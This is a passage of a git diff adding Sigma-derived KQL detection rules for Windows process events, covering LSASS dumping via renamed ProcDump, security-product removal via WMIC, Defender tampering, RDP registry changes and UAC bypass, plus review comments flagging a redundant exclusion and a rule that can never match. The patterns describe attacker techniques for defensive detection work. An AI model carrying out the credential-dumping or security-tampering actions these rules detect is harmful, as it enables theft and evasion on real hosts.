+| where (((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%")) and (FolderPath endswith "\\mofcomp.exe" or ProcessVersionInfoOriginalFileName =~ "mofcomp.exe")) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"))) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_suspicious_registry_file_imported_via_reg_exe.kql b/KQL/rules/windows/process_creation/potential_suspicious_registry_file_imported_via_reg_exe.kql
new file mode 100644
index 00000000..eac0d05c
--- /dev/null
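Review bot: The two `not(...)` clauses at the end of the mofcomp hunk overlap: the second, `not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof"))`, is a superset of the first, which additionally requires `InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"`, so the WmiPrvSE-scoped exclusion never changes the result. The net effect is that every `.mof` compiled from that TEMP directory is excluded regardless of parent process, which is a wider exclusion than the first filter suggests was intended. If the parent-scoped exclusion is the intent, drop the second clause; if both are faithful to the upstream Sigma rule, a comment such as `// NOTE: the generic TEMP filter subsumes the WmiPrvSE-specific one` would save the next reader the same analysis.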
+++ b/KQL/rules/windows/process_creation/potential_suspicious_registry_file_imported_via_reg_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Suspicious Registry File Imported Via Reg.EXE
+// Author: frack113, Nasreddine Bencherchali
+// Date: 2022-08-01
+// Level: medium
+// Description: Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.t1112, attack.defense-evasion
+// False Positives:
+// - Legitimate import of keys
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " import " and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "C:\\Users\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\" or ProcessCommandLine contains "C:\\ProgramData\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_suspicious_windows_feature_enabled_proccreation.kql b/KQL/rules/windows/process_creation/potential_suspicious_windows_feature_enabled_proccreation.kql
new file mode 100644
index 00000000..aa27fb56
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_suspicious_windows_feature_enabled_proccreation.kql
@@ -0,0 +1,13 @@
+// Title: Potential Suspicious Windows Feature Enabled - ProcCreation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-29
+// Level: medium
+// Description: Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool.
+// Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+// - Legitimate usage of the features listed in the rule.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "Enable-WindowsOptionalFeature" and ProcessCommandLine contains "-Online" and ProcessCommandLine contains "-FeatureName") and (ProcessCommandLine contains "TelnetServer" or ProcessCommandLine contains "Internet-Explorer-Optional-amd64" or ProcessCommandLine contains "TFTP" or ProcessCommandLine contains "SMB1Protocol" or ProcessCommandLine contains "Client-ProjFS" or ProcessCommandLine contains "Microsoft-Windows-Subsystem-Linux")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_sysinternals_procdump_evasion.kql b/KQL/rules/windows/process_creation/potential_sysinternals_procdump_evasion.kql
new file mode 100644
index 00000000..492cefa5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_sysinternals_procdump_evasion.kql
@@ -0,0 +1,12 @@
+// Title: Potential SysInternals ProcDump Evasion
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-01-11
+// Level: high
+// Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access
+// False Positives:
+// - False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "copy procdump" or ProcessCommandLine contains "move procdump") or ((ProcessCommandLine contains "2.dmp" or ProcessCommandLine contains "lsass" or ProcessCommandLine contains "out.dmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains ".dmp ")) or (ProcessCommandLine contains "copy lsass.exe_" or ProcessCommandLine contains "move lsass.exe_")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql b/KQL/rules/windows/process_creation/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql
new file mode 100644
index 00000000..5c771af8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Tampering With RDP Related Registry Keys Via Reg.EXE
+// Author: pH-T (Nextron Systems), @Kostastsale, TheDFIRReport
+// Date: 2022-02-12
+// Level: high
+// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.lateral-movement, attack.t1021.001, attack.t1112
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fDenyTSConnections" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "SecurityLayer" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "WinStations\\RDP-Tcp")) and (not((ProcessCommandLine contains "SecurityLayer" and ProcessCommandLine contains "02")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_tampering_with_security_products_via_wmic.kql b/KQL/rules/windows/process_creation/potential_tampering_with_security_products_via_wmic.kql
new file mode 100644
index 00000000..384b51d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_tampering_with_security_products_via_wmic.kql 
@@ -0,0 +1,12 @@
+// Title: Potential Tampering With Security Products Via WMIC
+// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-01-30
+// Level: high
+// Description: Detects uninstallation or termination of security products using the WMIC utility
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1562.001
+// False Positives:
+// - Legitimate administration
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "wmic" and ProcessCommandLine contains "product where " and ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall" and ProcessCommandLine contains "/nointeractive") or ((ProcessCommandLine contains "call delete" or ProcessCommandLine contains "call terminate") and (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "caption like ")) or (ProcessCommandLine contains "process " and ProcessCommandLine contains "where " and ProcessCommandLine contains "delete")) and (ProcessCommandLine contains "%carbon%" or ProcessCommandLine contains "%cylance%" or ProcessCommandLine contains "%endpoint%" or ProcessCommandLine contains "%eset%" or ProcessCommandLine contains "%malware%" or ProcessCommandLine contains "%Sophos%" or ProcessCommandLine contains "%symantec%" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "AVG " or ProcessCommandLine contains "Carbon Black" or ProcessCommandLine contains "CarbonBlack" or ProcessCommandLine contains "Cb Defense Sensor 64-bit" or ProcessCommandLine contains "Crowdstrike Sensor" or ProcessCommandLine contains "Cylance " or ProcessCommandLine contains "Dell Threat Defense" or ProcessCommandLine contains "DLP Endpoint" or ProcessCommandLine contains "Endpoint Detection" or ProcessCommandLine contains "Endpoint Protection" or ProcessCommandLine contains "Endpoint Security" or ProcessCommandLine contains "Endpoint Sensor" or ProcessCommandLine contains "ESET File Security" or ProcessCommandLine contains "LogRhythm System Monitor Service" or ProcessCommandLine contains "Malwarebytes" or ProcessCommandLine contains "McAfee Agent" or ProcessCommandLine contains "Microsoft Security Client" or ProcessCommandLine contains "Sophos Anti-Virus" or ProcessCommandLine contains "Sophos AutoUpdate" or ProcessCommandLine contains "Sophos Credential Store" or ProcessCommandLine contains "Sophos Management Console" or ProcessCommandLine contains "Sophos Management Database" or ProcessCommandLine contains "Sophos Management Server" or ProcessCommandLine contains "Sophos Remote Management System" or ProcessCommandLine contains "Sophos Update Manager" or ProcessCommandLine contains "Threat Protection" or ProcessCommandLine contains "VirusScan" or ProcessCommandLine contains "Webroot SecureAnywhere" or ProcessCommandLine contains "Windows Defender")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_uac_bypass_via_sdclt_exe.kql b/KQL/rules/windows/process_creation/potential_uac_bypass_via_sdclt_exe.kql
new file mode 100644
index 00000000..427d3856
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_uac_bypass_via_sdclt_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential UAC Bypass Via Sdclt.EXE
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-05-02
+// Level: medium
+// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1548.002
+
+DeviceProcessEvents
+| where FolderPath endswith "sdclt.exe" and (ProcessIntegrityLevel in~ ("High", "S-1-16-12288"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql
new file mode 100644
index 00000000..dbbbbe1e
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_unquoted_service_path_reconnaissance_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Unquoted Service Path Reconnaissance Via Wmic.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects known WMI recon method to look for unquoted service paths using wmic. Often used by pentester and attacker enumeration scripts
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " service get " and ProcessCommandLine contains "name,displayname,pathname,startmode") and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_winapi_calls_via_commandline.kql b/KQL/rules/windows/process_creation/potential_winapi_calls_via_commandline.kql
new file mode 100644
index 00000000..cccb816c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_winapi_calls_via_commandline.kql
@@ -0,0 +1,12 @@
+// Title: Potential WinAPI Calls Via CommandLine
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-06
+// Level: high
+// Description: Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1106
+// False Positives:
+// - Some legitimate action or applications may use these functions. Investigate further to determine the legitimacy of the activity.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "AddSecurityPackage" or ProcessCommandLine contains "AdjustTokenPrivileges" or ProcessCommandLine contains "Advapi32" or ProcessCommandLine contains "CloseHandle" or ProcessCommandLine contains "CreateProcessWithToken" or ProcessCommandLine contains "CreatePseudoConsole" or ProcessCommandLine contains "CreateRemoteThread" or ProcessCommandLine contains "CreateThread" or ProcessCommandLine contains "CreateUserThread" or ProcessCommandLine contains "DangerousGetHandle" or ProcessCommandLine contains "DuplicateTokenEx" or ProcessCommandLine contains "EnumerateSecurityPackages" or ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "FreeLibrary" or ProcessCommandLine contains "GetDelegateForFunctionPointer" or ProcessCommandLine contains "GetLogonSessionData" or ProcessCommandLine contains "GetModuleHandle" or ProcessCommandLine contains "GetProcAddress" or ProcessCommandLine contains "GetProcessHandle" or ProcessCommandLine contains "GetTokenInformation" or ProcessCommandLine contains "ImpersonateLoggedOnUser" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "LoadLibrary" or ProcessCommandLine contains "memcpy" or ProcessCommandLine contains "MiniDumpWriteDump" or ProcessCommandLine contains "ntdll" or ProcessCommandLine contains "OpenDesktop" or ProcessCommandLine contains "OpenProcess" or ProcessCommandLine contains "OpenProcessToken" or ProcessCommandLine 
contains "OpenThreadToken" or ProcessCommandLine contains "OpenWindowStation" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "QueueUserApc" or ProcessCommandLine contains "ReadProcessMemory" or ProcessCommandLine contains "RevertToSelf" or ProcessCommandLine contains "RtlCreateUserThread" or ProcessCommandLine contains "secur32" or ProcessCommandLine contains "SetThreadToken" or ProcessCommandLine contains "VirtualAlloc" or ProcessCommandLine contains "VirtualFree" or ProcessCommandLine contains "VirtualProtect" or ProcessCommandLine contains "WaitForSingleObject" or ProcessCommandLine contains "WriteInt32" or ProcessCommandLine contains "WriteProcessMemory" or ProcessCommandLine contains "ZeroFreeGlobalAllocUnicode") and (not((((ProcessCommandLine contains "FreeHGlobal" or ProcessCommandLine contains "PtrToString" or ProcessCommandLine contains "kernel32" or ProcessCommandLine contains "CloseHandle") and InitiatingProcessFolderPath endswith "\\CompatTelRunner.exe") or (ProcessCommandLine contains "GetLoadLibraryWAddress32" and FolderPath endswith "\\MpCmdRun.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql b/KQL/rules/windows/process_creation/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql
new file mode 100644
index 00000000..68f3da01
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql
@@ -0,0 +1,11 @@
+// Title: Potential Windows Defender AV Bypass Via Dump64.EXE Rename
+// Author: Austin Songer @austinsonger, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-11-26
+// Level: high
+// Description: Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder.
+// Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003.001
+
+DeviceProcessEvents
+| where (FolderPath contains "\\Microsoft Visual Studio\\" and FolderPath endswith "\\dump64.exe" and FolderPath startswith ":\\Program Files") and (ProcessVersionInfoOriginalFileName =~ "procdump" or (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " -mp "))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_windows_defender_tampering_via_wmic_exe.kql b/KQL/rules/windows/process_creation/potential_windows_defender_tampering_via_wmic_exe.kql
new file mode 100644
index 00000000..f80dbf78
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_windows_defender_tampering_via_wmic_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential Windows Defender Tampering Via Wmic.EXE
+// Author: frack113
+// Date: 2022-12-11
+// Level: high
+// Description: Detects potential tampering with Windows Defender settings such as adding exclusion using wmic
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1047, attack.t1562
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "/Namespace:\\\\root\\Microsoft\\Windows\\Defender" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
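Review bot: The dump64 rule can never match as written: `FolderPath startswith ":\\Program Files"` requires the path to begin with a colon, but DeviceProcessEvents.FolderPath begins with the drive letter, so the `and` chain is always false and the rule is silently dead. This looks like a converter artefact where a drive-agnostic Sigma prefix was mapped to `startswith` instead of a substring test; the rest of this diff uses `contains ":\\..."` for the same purpose (see the aspnet_compiler and eventvwr rules). Change the clause to `FolderPath contains ":\\Program Files"`, or anchor it as `FolderPath matches regex @"^[A-Za-z]:\\Program Files"` if the leading-drive position must be enforced, and check whether helper.py emits `startswith ":\\"` for any other rule.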
diff --git a/KQL/rules/windows/process_creation/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql b/KQL/rules/windows/process_creation/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql
new file mode 100644
index 00000000..6cc17ee5
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_wmi_lateral_movement_wmiprvse_spawned_powershell.kql
@@ -0,0 +1,14 @@
+// Title: Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell
+// Author: Markus Neis @Karneades
+// Date: 2019-04-03
+// Level: medium
+// Description: Detects Powershell as a child of the WmiPrvSE process. Which could be a sign of lateral movement via WMI.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1047, attack.t1059.001
+// False Positives:
+// - AppvClient
+// - CCM
+// - WinRM
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql b/KQL/rules/windows/process_creation/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql
new file mode 100644
index 00000000..81e30852
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_over_permissive_permissions_granted_using_dsacls_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Over Permissive Permissions Granted Using Dsacls.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects usage of Dsacls to grant over permissive permissions
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - Legitimate administrators granting over permissive permissions to users
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " /G " and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE") and (ProcessCommandLine contains "GR" or ProcessCommandLine contains "GE" or ProcessCommandLine contains "GW" or ProcessCommandLine contains "GA" or ProcessCommandLine contains "WP" or ProcessCommandLine contains "WD")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql b/KQL/rules/windows/process_creation/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql
new file mode 100644
index 00000000..e4df4694
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_asp_net_compilation_via_aspnetcompiler.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious ASP.NET Compilation Via AspNetCompiler
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-08-14
+// Level: high
+// Description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Roaming\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\") and (FolderPath contains ":\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\Framework64\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm\\" or FolderPath contains ":\\Windows\\Microsoft.NET\\FrameworkArm64\\") and FolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_cabinet_file_expansion.kql b/KQL/rules/windows/process_creation/potentially_suspicious_cabinet_file_expansion.kql
new file mode 100644
index 00000000..47897836
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_cabinet_file_expansion.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Cabinet File Expansion
+// Author: Bhabesh Raj, X__Junior (Nextron Systems)
+// Date: 2021-07-30
+// Level: medium
+// Description: Detects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - System administrator Usage
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "-F:" or ProcessCommandLine contains "/F:" or ProcessCommandLine contains "–F:" or ProcessCommandLine contains "—F:" or ProcessCommandLine contains "―F:") and FolderPath endswith "\\expand.exe") and ((ProcessCommandLine contains ":\\Perflogs\\" or ProcessCommandLine contains ":\\ProgramData" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Admin$\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\C$\\" or ProcessCommandLine contains "\\Temporary Internet") or ((ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favorites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Favourites\\") or (ProcessCommandLine contains ":\\Users\\" and ProcessCommandLine contains "\\Contacts\\"))) and (not((ProcessCommandLine contains "C:\\ProgramData\\Dell\\UpdateService\\Temp\\" and InitiatingProcessFolderPath =~ "C:\\Program Files (x86)\\Dell\\UpdateService\\ServiceShell.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_call_to_win32_nteventlogfile_class.kql b/KQL/rules/windows/process_creation/potentially_suspicious_call_to_win32_nteventlogfile_class.kql
new file mode 100644
index 00000000..06dd67fe
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_call_to_win32_nteventlogfile_class.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Call To Win32_NTEventlogFile Class
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-13
+// Level: high
+// Description: Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "Win32_NTEventlogFile" and (ProcessCommandLine contains ".BackupEventlog(" or ProcessCommandLine contains ".ChangeSecurityPermissions(" or ProcessCommandLine contains ".ChangeSecurityPermissionsEx(" or ProcessCommandLine contains ".ClearEventLog(" or ProcessCommandLine contains ".Delete(" or ProcessCommandLine contains ".DeleteEx(" or ProcessCommandLine contains ".Rename(" or ProcessCommandLine contains ".TakeOwnerShip(" or ProcessCommandLine contains ".TakeOwnerShipEx(")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_clickonce_application.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_clickonce_application.kql
new file mode 100644
index 00000000..a74ccf6c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_clickonce_application.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Child Process Of ClickOnce Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-12
+// Level: medium
+// Description: Detects potentially suspicious child processes of a ClickOnce deployment application
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.defense-evasion
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\nltest.exe" or FolderPath endswith "\\notepad.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\werfault.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Apps\\2.0\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_diskshadow_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_diskshadow_exe.kql
new file mode 100644
index 00000000..b296f73d
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_diskshadow_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Child Process Of DiskShadow.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-15
+// Level: medium
+// Description: Detects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+// - False postitve can occur in cases where admin scripts levreage the "exec" flag to execute applications
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\diskshadow.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_keyscrambler_exe.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_keyscrambler_exe.kql
new file mode 100644
index 00000000..8d07fe60
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_keyscrambler_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Child Process of KeyScrambler.exe
+// Author: Swachchhanda Shrawan Poudel
+// Date: 2024-05-13
+// Level: medium
+// Description: Detects potentially suspicious child processes of KeyScrambler.exe
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.privilege-escalation, attack.t1203, attack.t1574.001
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "mshta.exe", "PowerShell.EXE", "pwsh.dll", "regsvr32.exe", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\KeyScrambler.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_regsvr32.kql b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_regsvr32.kql
new file mode 100644
index 00000000..85740b3c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potentially_suspicious_child_process_of_regsvr32.kql
@@ -0,0 +1,12 @@
+// Title: Potentially Suspicious Child Process Of Regsvr32
+// Author: elhoim, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-05-05
+// Level: high
+// Description: Detects potentially suspicious child processes of "regsvr32.exe".
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.010
+// False Positives:
+// - Unlikely, but can rarely occur. Apply additional filters accordingly.
+
+DeviceProcessEvents
